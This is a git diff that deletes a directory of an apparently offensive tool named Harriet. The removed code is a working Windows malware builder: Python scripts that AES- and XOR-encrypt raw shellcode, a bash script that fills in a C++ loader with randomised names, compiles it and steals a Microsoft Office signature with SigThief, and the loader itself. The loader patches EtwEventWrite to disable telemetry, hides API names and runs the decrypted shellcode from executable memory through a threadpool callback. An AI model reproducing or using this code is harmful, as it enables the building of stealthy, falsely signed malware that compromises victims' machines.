Delete Harriet/Harriet/ThreadPoolWait directory

Harriet/Harriet/ThreadPoolWait/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

Harriet/Harriet/ThreadPoolWait/Resources/xor.py

@@ -1,32 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with XOR
-#
-# author: reenz0h (twitter: @sektor7net)
-
-import sys
-
-KEY = "NhiLqsjiZXHLmVt"
-
-def xor(data, key):
-	l = len(key)
-	output_str = ""
-
-	for i in range(len(data)):
-		current = data[i]
-		current_key = key[i%len(key)]
-		output_str += chr(ord(current) ^ ord(current_key))
-	
-	return output_str
-
-def printC(ciphertext):
-	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
-
-try:
-    plaintext = open(sys.argv[1], "r").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = xor(plaintext, KEY)
-
-printC(ciphertext)

Harriet/Harriet/ThreadPoolWait/TPW.sh

@@ -1,109 +0,0 @@
-#!/bin/bash
-
-# Color variables
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-cat << "EOF"
- _____ _                        _______           _ _    _       _ _   
-|_   _| |                      | | ___ \         | | |  | |     (_) |  
-  | | | |__  _ __ ___  __ _  __| | |_/ /__   ___ | | |  | | __ _ _| |_ 
-  | | | '_ \| '__/ _ \/ _` |/ _` |  __/ _ \ / _ \| | |/\| |/ _` | | __|
-  | | | | | | | |  __/ (_| | (_| | | | (_) | (_) | \  /\  / (_| | | |_ 
-  \_/ |_| |_|_|  \___|\__,_|\__,_\_|  \___/ \___/|_|\/  \/ \__,_|_|\__|
-                                                                       
-EOF
-echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
-echo ""
-read Shellcode
-echo ""
-echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
-echo ""
-read MALWARE
-echo ""
-cp Harriet/ThreadPoolWait/xor.py Harriet/ThreadPoolWait/Resources/xor.py
-cp Harriet/ThreadPoolWait/template.cpp Harriet/ThreadPoolWait/Resources/template.cpp
-echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
-echo ""
-sleep 2
-python3 Harriet/ThreadPoolWait/Resources/aesencrypt.py $Shellcode > shell.txt
-echo -e ${yellow}"***Encryption Completed***"${clear}
-echo ""
-cp shell.txt shell2.txt
-#Generate AES Key
-keys=$(cat "shell2.txt")
-cut -d 'p' -f1 shell2.txt > shell3.txt
-keys=$(cat shell3.txt)
-keysnow=${keys#*=}
-sed -i "s/KEYVALUE/$keysnow/g" Harriet/ThreadPoolWait/Resources/template.cpp
-
-#Generate AES Payload
-payload=$(cat "shell.txt")
-payloadnow=${payload#*;}
-payloadtoday=${payloadnow#*=}
-echo $payloadtoday > shell5.txt
-perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Harriet/ThreadPoolWait/Resources/template.cpp
-sleep 2
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-8} | head -n 1 > shell.txt
-Random1=$(cat shell.txt)
-sed -i "s/Random1/$Random1/g" Harriet/ThreadPoolWait/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random2=$(cat shell.txt)
-sed -i "s/Random2/$Random2/g" Harriet/ThreadPoolWait/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-Random3=$(cat shell.txt)
-sed -i "s/Random3/$Random3/g" Harriet/ThreadPoolWait/Resources/template.cpp
-
-#VIRTUALALLOC VARIABLE NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-Random9=$(cat shell.txt)
-sed -i "s/Random9/$Random9/g" Harriet/ThreadPoolWait/Resources/template.cpp
-
-#XOR FUNCTION VARIABLE NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomA=$(cat shell.txt)
-sed -i "s/RandomA/$RandomA/g" Harriet/ThreadPoolWait/Resources/template.cpp
-
-#XOR KEY VALUE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-15} | head -n 1 > shell.txt
-XOR_KEY=$(cat shell.txt)
-sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/ThreadPoolWait/Resources/template.cpp
-sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/ThreadPoolWait/Resources/xor.py
-
-#XOR KEY VARIABLE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-17} | head -n 1 > shell.txt
-XOR_VARIABLE=$(cat shell.txt)
-sed -i "s/XOR_VARIABLE/$XOR_VARIABLE/g" Harriet/ThreadPoolWait/Resources/template.cpp
-rm shell.txt
-
-#VIRTUALALLOC - XOR String
-echo VirtualAlloc > virt.txt
-python3 Harriet/ThreadPoolWait/Resources/xor.py virt.txt > virtalloc.txt
-virt=$(cat virtalloc.txt)
-virt2="${virt::-8}" 
-sed -i "s/VIRALO/$virt2/g" Harriet/ThreadPoolWait/Resources/template.cpp 
-rm virt*
-
-echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -o $MALWARE Harriet/ThreadPoolWait/Resources/template.cpp -fpermissive -Wno-narrowing >/dev/null 2>&1
-echo ""
-sleep 2
-rm shell*
-echo -e ${yellow}"***Malware Compiled***"${clear}
-echo ""
-sleep 2
-echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
-echo ""
-sleep 2
-python3 Harriet/Resources/SigThief/sigthief.py -i Harriet/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
-mv signed$MALWARE $MALWARE
-echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
-echo ""
-

Harriet/Harriet/ThreadPoolWait/template.cpp

@@ -1,98 +0,0 @@
-#include <windows.h>
-#include <threadpoolapiset.h>
-#include <windows.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#pragma comment (lib, "crypt32.lib")
-#pragma comment (lib, "advapi32")
-#include <psapi.h>
-
-LPVOID (WINAPI * Virt_Alloc)(  LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
-
-char XOR_VARIABLE []= "XOR_KEY";
-
-unsigned char Random9 []= VIRALO}; 
-
-
-int Random1(char * Random2, unsigned int Random2_len, char * Random3, size_t Random3len) {
-        HCRYPTPROV hProv;
-        HCRYPTHASH hHash;
-        HCRYPTKEY hKey;
-
-        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
-                return -1;
-        }
-        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
-                return -1;
-        }
-        if (!CryptHashData(hHash, (BYTE*)Random3, (DWORD)Random3len, 0)){
-                return -1;              
-        }
-        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
-                return -1;
-        }
-         
-        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, Random2, &Random2_len)){
-                return -1;
-        }
-         
-        CryptReleaseContext(hProv, 0);
-        CryptDestroyHash(hHash);
-        CryptDestroyKey(hKey);
-        
-        return 0;
-}
-
-void RandomA(char * tada, int tada_len, char * XOR_VARIABLE, size_t XOR_VARIABLE_len) {
-        int r;
-        r = 0;
-        for (int i = 0; i < tada_len; i++) {
-                if (r == XOR_VARIABLE_len - 1) r = 0;
-
-                tada[i] = tada[i] ^ XOR_VARIABLE[r];
-                r++;
-        }
-}
-
-
-int main() { 
-        BOOL rv;
-        HANDLE th;
-    DWORD oldprotect = 0;
-        
-        char Random3 []=KEYVALUE 
-        unsigned char Random2[]=PAYVAL 
-
-        unsigned int Random2_len = sizeof(Random2);
-	
-	void * addr = GetProcAddress(GetModuleHandle("ntdll.dll"), "EtwEventWrite");
-        VirtualProtect(addr, 4096, PAGE_EXECUTE_READWRITE, &oldprotect);
-
-        #ifdef _WIN64
-        memcpy(addr, "\x48\x33\xc0\xc3", 4);            
-        #else
-        memcpy(addr, "\x33\xc0\xc2\x14\x00", 5);                
-        #endif  
-
-        VirtualProtect(addr, 4096, oldprotect, &oldprotect);
-
-        FreeConsole();
-        Random1((char *) Random2, Random2_len, Random3, sizeof(Random3));
-        
-        HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
-        
-        RandomA((char *) Random9, sizeof (Random9), XOR_VARIABLE, sizeof(XOR_VARIABLE));
-	Virt_Alloc= GetProcAddress(GetModuleHandle("kernel32.dll"), Random9);	
-        
-        LPVOID Random2Address = Virt_Alloc(NULL, sizeof(Random2), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-        RtlMoveMemory(Random2Address, Random2, sizeof(Random2));
-
-        PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)Random2Address, NULL, NULL);
-        SetThreadpoolWait(threadPoolWait, event, NULL);
-        WaitForSingleObject(event, INFINITE);
-        
-        return 0;
-}
-

Harriet/Harriet/ThreadPoolWait/xor.py

@@ -1,32 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with XOR
-#
-# author: reenz0h (twitter: @sektor7net)
-
-import sys
-
-KEY = "XOR_KEY"
-
-def xor(data, key):
-	l = len(key)
-	output_str = ""
-
-	for i in range(len(data)):
-		current = data[i]
-		current_key = key[i%len(key)]
-		output_str += chr(ord(current) ^ ord(current_key))
-	
-	return output_str
-
-def printC(ciphertext):
-	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
-
-try:
-    plaintext = open(sys.argv[1], "r").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = xor(plaintext, KEY)
-
-printC(ciphertext)